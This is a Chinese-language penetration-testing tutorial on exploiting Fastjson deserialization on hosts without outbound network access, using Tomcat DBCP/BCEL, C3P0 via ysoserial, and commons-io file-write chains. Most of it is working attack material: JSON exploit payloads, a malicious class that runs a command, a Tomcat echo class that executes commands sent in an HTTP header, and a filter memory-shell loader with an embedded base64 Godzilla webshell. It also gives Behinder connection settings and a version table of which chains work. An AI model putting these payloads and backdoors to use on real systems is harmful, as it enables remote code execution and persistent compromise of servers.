前言
实战中会遇到众多fastjson不出网的情况,或者fastjson漏洞无法ldap的情况,探究一下不出网情况的利用姿势。
BCEL类
利用tomcat的BasicDataSource链,将poc的class字节码转化为bcel然后发送payload。
- Tomcat的依赖
- JDK < 8u251
环境:
- fastjson 1.2.24 版本
- apache-tomcat-8.5.37 利用
创建恶意类
import java.io.IOException;
/**
* @author cseroad
*/
public class exp {
static {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException e) {
e.printStackTrace();
}
}
}
然后进行$$bcel$$编码
public class Test {
public static void main(String[] args) throws IOException {
JavaClass javaClass = Repository.lookupClass(exp.class);
String encode = Utility.encode(javaClass.getBytes(), true);
System.out.println(encode);
}
}
exp为
{
{
"x":{
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "$$BCEL$$$l$..."
}
}: "x"
}
Tomcat 8.0以上使用org.apache.tomcat.dbcp.dbcp2.BasicDataSource
Tomcat 8.0以下使用org.apache.tomcat.dbcp.dbcp.BasicDataSource
image.png
tomcat 回显代码
import java.lang.reflect.Field;
import java.util.List;
import java.util.Scanner;
public class TomcatEcho {
private static void writeBody(Object var0, byte[] var1) throws Exception {
Object var2;
Class var3;
try {
var3 = Class.forName("org.apache.tomcat.util.buf.ByteChunk");
var2 = var3.newInstance();
var3.getDeclaredMethod("setBytes", byte[].class, Integer.TYPE, Integer.TYPE).invoke(var2, var1, new Object[]{new Integer(0), new Integer(var1.length)});
var0.getClass().getMethod("doWrite", var3).invoke(var0, var2);
} catch (ClassNotFoundException var5) {
var3 = Class.forName("java.nio.ByteBuffer");
var2 = var3.getDeclaredMethod("wrap", byte[].class).invoke(var3, var1);
var0.getClass().getMethod("doWrite", var3).invoke(var0, var2);
} catch (NoSuchMethodException var6) {
var3 = Class.forName("java.nio.ByteBuffer");
var2 = var3.getDeclaredMethod("wrap", byte[].class).invoke(var3, var1);
var0.getClass().getMethod("doWrite", var3).invoke(var0, var2);
}
}
private static Object getFV(Object var0, String var1) throws Exception {
Field var2 = null;
Class var3 = var0.getClass();
while(var3 != Object.class) {
try {
var2 = var3.getDeclaredField(var1);
break;
} catch (NoSuchFieldException var5) {
var3 = var3.getSuperclass();
}
}
if (var2 == null) {
throw new NoSuchFieldException(var1);
} else {
var2.setAccessible(true);
return var2.get(var0);
}
}
static {
try {
boolean var0 = false;
Thread[] var1 = (Thread[])((Thread[])getFV(Thread.currentThread().getThreadGroup(), "threads"));
for(int var2 = 0; var2 < var1.length; ++var2) {
Thread var3 = var1[var2];
if (var3 != null) {
String var4 = var3.getName();
if (!var4.contains("exec") && var4.contains("http")) {
Object var5 = getFV(var3, "target");
if (var5 instanceof Runnable) {
try {
var5 = getFV(getFV(getFV(var5, "this$0"), "handler"), "global");
} catch (Exception var11) {
continue;
}
List var6 = (List)getFV(var5, "processors");
for(int var7 = 0; var7 < var6.size(); ++var7) {
Object var8 = var6.get(var7);
var5 = getFV(var8, "req");
Object var9 = var5.getClass().getMethod("getResponse").invoke(var5);
var4 = (String)var5.getClass().getMethod("getHeader", String.class).invoke(var5, new String("Testecho"));
if (var4 != null && !var4.isEmpty()) {
var9.getClass().getMethod("setStatus", Integer.TYPE).invoke(var9, new Integer(200));
var9.getClass().getMethod("addHeader", String.class, String.class).invoke(var9, new String("Testecho"), var4);
var0 = true;
}
var4 = (String)var5.getClass().getMethod("getHeader", String.class).invoke(var5, new String("Testcmd"));
if (var4 != null && !var4.isEmpty()) {
var9.getClass().getMethod("setStatus", Integer.TYPE).invoke(var9, new Integer(200));
String[] var10 = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", var4} : new String[]{"/bin/sh", "-c", var4};
writeBody(var9, (new Scanner((new ProcessBuilder(var10)).start().getInputStream())).useDelimiter("\\A").next().getBytes());
var0 = true;
}
if ((var4 == null || var4.isEmpty()) && var0) {
writeBody(var9, System.getProperties().toString().getBytes());
}
if (var0) {
break;
}
}
if (var0) {
break;
}
}
}
}
}
} catch (Exception var12) {
}
}
}
tomcat 内存马代码
package com.fastjson.vul;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Vector;
public class TomcatMemory7 {
static {
try {
Method method = Thread.currentThread().getContextClassLoader().getClass().getSuperclass().getDeclaredMethod("getResources");
Object o = method.invoke(Thread.currentThread().getContextClassLoader());
Method method2 = o.getClass().getDeclaredMethod("getContext");
Object o2 = method2.invoke(o);
Constructor B64DecodeConstructor = Class.forName("sun.misc.BASE64Decoder", true, Thread.currentThread().getContextClassLoader()).getDeclaredConstructor();
Object b64Decoder = B64DecodeConstructor.newInstance();
String codeClass = "yv66vgAAADQBKgoATACgCAChCQAXAKIIAKMJABcApAcApQoABgCgCgAGAKYKAAYApwoAFwCoCQAXAKkIAKoJABcAqwoATACsBwCtBwCuCwAPAK8LALAAsQoAFwCyCgAXALMIALQLALUAtgcAtwoAMwC4CgAhALkKABcArAoAFwC6CwC1ALsIALwLAA8AuwcAvQoAHwCgBwC+CgAhAL8KADMAwAsAEADBCgAyAMIKAMMAxAoAMwCnCgAfAMUKABcAxgoAMgDHBwDICADJCgAhAMoIAMsKACEAzAoAzQDOCADPBwDQBwDRBwBxCADSCADTCADUCADVCADWCADXCADYCgDZANoHANsKADIA3AoAPQDdCgDZAN4KANkA3wgA4AoA4QDiCgAyAOMKAOEA5AcA5QoA4QDmCgBGAOcKAEYA6AoAMgDpCgBMAOoHAOsHAOwBAAJ4YwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA1B3ZAEAA21kNQEAAmNzAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA5MdGVzdC9nb2R6aWxhOwEAGihMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQABegEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAQTWV0aG9kUGFyYW1ldGVycwEABGluaXQBAB8oTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOylWAQAMZmlsdGVyQ29uZmlnAQAcTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOwEACkV4Y2VwdGlvbnMHAO0BAAhkb0ZpbHRlcgEAWyhMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7TGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47KVYBAAZhcnJPdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQABZgEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAB3JlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAdzZXNzaW9uAQAgTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbjsBAARkYXRhAQACW0IBAANyZXEBAB5MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDsBAARyZXNwAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEABWNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47AQANU3RhY2tNYXBUYWJsZQcAtwcA7gcA7wcA8AcArQcArgcA8QcAyAcA8gEAB2Rlc3Ryb3kBAAxiYXNlNjREZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAGYmFzZTY0AQARTGphdmEvbGFuZy9DbGFzczsBAAdkZWNvZGVyAQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAAmJzAQAFdmFsdWUHANABAAxiYXNlNjRFbmNvZGUBABYoW0IpTGphdmEvbGFuZy9TdHJpbmc7AQAHRW5jb2RlcgEAAXgBAAcoW0JaKVtCAQABYwEAFUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEAAXMBAAFtAQABWgcA8wEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAdTGphdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdDsBAANyZXQBAAFRAQAVKFtCKUxqYXZhL2xhbmcvQ2xhc3M7AQACY2IBAApTb3VyY2VGaWxlAQAMZ29kemlsYS5qYXZhDABTAFQBABAzYzZlMGI4YTljMTUyMjRhDABOAE8BAAdzdXBlcnNiDABQAE8BABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwA9AD1DAD2APcMAFEAmAwAUQBPAQAFVVRGLTgMAFIATwwAUwBaAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAD4APkHAO4MAPoAmAwAgwCEDACQAJEBAAdwYXlsb2FkBwDxDAD7APwBAAx0ZXN0L2dvZHppbGEMAP0A/gwA/wEADACbAJwMAQEBAgEACnBhcmFtZXRlcnMBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQEAD2phdmEvbGFuZy9DbGFzcwwBAwEEDAEFAQYMAQcBCAwBCQEKBwELDAEMAQ0MAQ4BDwwAjQCODAEJARABABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAQamF2YS51dGlsLkJhc2U2NAwBEQESAQAKZ2V0RGVjb2RlcgwBEwEUBwEVDAEWARcBAAZkZWNvZGUBABBqYXZhL2xhbmcvU3RyaW5nAQAQamF2YS9sYW5nL09iamVjdAEAFnN1bi5taXNjLkJBU0U2NERlY29kZXIBAAxkZWNvZGVCdWZmZXIBAApnZXRFbmNvZGVyAQAOZW5jb2RlVG9TdHJpbmcBABZzdW4ubWlzYy5CQVNFNjRFbmNvZGVyAQAGZW5jb2RlAQADQUVTBwDzDAEYARkBAB9qYXZheC9jcnlwdG8vc3BlYy9TZWNyZXRLZXlTcGVjDAEaAQ8MAFMBGwwAXgEcDAEdAR4BAANNRDUHAR8MARgBIAwBIQEiDAEjASQBABRqYXZhL21hdGgvQmlnSW50ZWdlcgwBJQEPDABTASYMAPYBEAwBJwD3DAEoASkBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBABRqYXZheC9zZXJ2bGV0L0ZpbHRlcgEAHmphdmF4L3NlcnZsZXQvU2VydmxldEV4Y2VwdGlvbgEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QBAB1qYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZQEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4BAB5qYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb24BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQATamF2YXgvY3J5cHRvL0NpcGhlcgEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAApnZXRTZXNzaW9uAQAiKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uOwEADGdldFBhcmFtZXRlcgEADGdldEF0dHJpYnV0ZQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAOZ2V0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAMc2V0QXR0cmlidXRlAQAnKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvT2JqZWN0OylWAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAJc3Vic3RyaW5nAQAWKElJKUxqYXZhL2xhbmcvU3RyaW5nOwEAE2phdmEvaW8vUHJpbnRXcml0ZXIBAAV3cml0ZQEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAC3RvQnl0ZUFycmF5AQAEKClbQgEAFShJKUxqYXZhL2xhbmcvU3RyaW5nOwEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAC2dldEluc3RhbmNlAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAhnZXRCeXRlcwEAFyhbQkxqYXZhL2xhbmcvU3RyaW5nOylWAQAXKElMamF2YS9zZWN1cml0eS9LZXk7KVYBAAdkb0ZpbmFsAQAGKFtCKVtCAQAbamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0AQAxKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEABmxlbmd0aAEAAygpSQEABnVwZGF0ZQEAByhbQklJKVYBAAZkaWdlc3QBAAYoSVtCKVYBAAt0b1Vw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";
ClassLoader currentClassloader = Thread.currentThread().getContextClassLoader();
Method defineClass = Thread.currentThread().getContextClassLoader().getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
defineClass.setAccessible(true);
Class evilClass = (Class)defineClass.invoke(currentClassloader, (byte[])((byte[])((byte[])b64Decoder.getClass().getSuperclass().getDeclaredMethod("decodeBuffer", String.class).invoke(b64Decoder, codeClass))), 0, ((byte[])((byte[])((byte[])b64Decoder.getClass().getSuperclass().getDeclaredMethod("decodeBuffer", String.class).invoke(b64Decoder, codeClass)))).length);
Field currentClassloaderClasses = Thread.currentThread().getContextClassLoader().getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getDeclaredField("classes");
currentClassloaderClasses.setAccessible(true);
Vector classes = (Vector)currentClassloaderClasses.get(currentClassloader);
classes.add(0, evilClass);
Class filterClass = Class.forName("test.godzila", true, Thread.currentThread().getContextClassLoader());
Object filter = filterClass.newInstance();
Class filterDefClass = Class.forName("org.apache.tomcat.util.descriptor.web.FilterDef", true, Thread.currentThread().getContextClassLoader());
Object filterDef = filterDefClass.newInstance();
filterDefClass.getDeclaredMethod("setFilterName", String.class).invoke(filterDef, "supersb");
filterDefClass.getDeclaredMethod("setFilterClass", String.class).invoke(filterDef, filter.getClass().getName());
filterDefClass.getDeclaredMethod("setFilter", Class.forName("javax.servlet.Filter", true, Thread.currentThread().getContextClassLoader())).invoke(filterDef, filter);
Method addfilterdef = o2.getClass().getDeclaredMethod("addFilterDef", filterDefClass);
addfilterdef.invoke(o2, filterDef);
Constructor filterMapConstructor = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap", true, Thread.currentThread().getContextClassLoader()).getDeclaredConstructor();
Object filterMap = filterMapConstructor.newInstance();
Method setFilterName = filterMap.getClass().getDeclaredMethod("setFilterName", String.class);
setFilterName.invoke(filterMap, filterDef.getClass().getDeclaredMethod("getFilterName").invoke(filterDef, (Object[])null));
Method setDispatcher = filterMap.getClass().getDeclaredMethod("setDispatcher", String.class);
setDispatcher.invoke(filterMap, "REQUEST");
Method addURLPattern = filterMap.getClass().getDeclaredMethod("addURLPattern", String.class);
addURLPattern.invoke(filterMap, "/supersb");
Method addFilterMapBefore = o2.getClass().getDeclaredMethod("addFilterMapBefore", Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap", true, Thread.currentThread().getContextClassLoader()));
addFilterMapBefore.invoke(o2, filterMap);
Constructor constructor = Class.forName("org.apache.catalina.core.ApplicationFilterConfig", true, Thread.currentThread().getContextClassLoader()).getDeclaredConstructor(Class.forName("org.apache.catalina.Context", true, Thread.currentThread().getContextClassLoader()), Class.forName("org.apache.tomcat.util.descriptor.web.FilterDef", true, Thread.currentThread().getContextClassLoader()));
constructor.setAccessible(true);
Object filterConfig = constructor.newInstance(o2, filterDef);
Field filterconfigsfield = Class.forName("org.apache.catalina.core.StandardContext", true, Thread.currentThread().getContextClassLoader()).getDeclaredField("filterConfigs");
filterconfigsfield.setAccessible(true);
HashMap filterConfigs = (HashMap)filterconfigsfield.get(o2);
filterConfigs.put("supersb", filterConfig);
} catch (Exception var27) {
}
}
}
fastjson 1.2.36 版本
{"name":{"@type":"java.lang.Class","val":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"x":{"name": {"@type":"java.lang.Class","val":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"y":
{"@type":"com.alibaba.fastjson.JSONObject","c": {"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},
"driverClassName":"$$BCEL$$...","$ref":"$.x.y.c.connection"}}}}
C3P0二次序列化
需要依赖
<dependency>
<groupId>com.mchange</groupId>
<artifactId>c3p0</artifactId>
<version>0.9.5.2</version>
</dependency>
只要存在C3P0依赖,FastJson<=1.2.47通杀,无需开启autotype,且能够不出网利用。
使用 https://github.com/Y4er/ysoserial 选择链生成十六进制字符串。
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Fastjson1 "open -a Calculator" | hex
构造数据包
{"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:HEXHEX;"}}
image.png
此时就可以进一步利用tomcat回显
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Fastjson1 "CLASS:TomcatCmdEcho" | hex
{"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:hex;"}}
image.png
打入内存马
java_secure java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Fastjson1 "CLASS:TomcatFilterMemShellFromJMX" | xxd -p
使用TomcatFilterMemShellFromJMX。
冰蝎连接时配置
x-client-data: rebeyond
Referer: https://www.google.com/
commonis-io 文件写入
需要依赖
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<version>2.5</version>
</dependency>
mac下构造数据包
{"x":{"@type":"com.alibaba.fastjson.JSONObject","input":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""123123aaaaa"},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"123.txt","encoding":"UTF-8","append":false},"charset":"UTF-8","bufferSize":1024,"writeImmediately":true},"trigger":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger2":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger3":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"}}}
成功写入
image.png
windows下
{"x":{"@type":"com.alibaba.fastjson.JSONObject","input":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.ReaderInputStream","reader":{"@type":"org.apache.commons.io.input.CharSequenceReader","charSequence":{"@type":"java.lang.String""123123aa"},"charsetName":"UTF-8","bufferSize":1024},"branch":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.output.WriterOutputStream","writer":{"@type":"org.apache.commons.io.output.FileWriterWithEncoding","file":"../webapps/1.txt","encoding":"UTF-8","append":false},"charsetName":"UTF-8","bufferSize":1024,"writeImmediately":true},"trigger":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger2":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"},"trigger3":{"@type":"java.lang.AutoCloseable","@type":"org.apache.commons.io.input.XmlStreamReader","is":{"@type":"org.apache.commons.io.input.TeeInputStream","input":{"$ref":"$.input"},"branch":{"$ref":"$.branch"},"closeBranch":true},"httpContentType":"text/xml","lenient":false,"defaultEncoding":"UTF-8"}}}
image.png
成功写入。
总结
| 版本 | tomcat.dbcp(<Tomcat8) | tomcat.dbcp (>Tomcat8) | c3p0 | commons-io(windows) | commons-io(linux) |
|---|---|---|---|---|---|
| <= 1.2.24 | ✓ | ✓ | ✓ | x | x |
| 1.2.25 - 1.2.35 | x | x | ✓ | x | x |
| 1.2.36 | ✓ | ✓ | ✓ | x | x |
| 1.2.37 - 1.2.47 | ✓ | ✓ | ✓ | ✓ | ✓ |
| 1.2.48 -1.2.68 | x | x | x | ✓ | ✓ |
| > 1.2.69 | x | x | x | x | x |
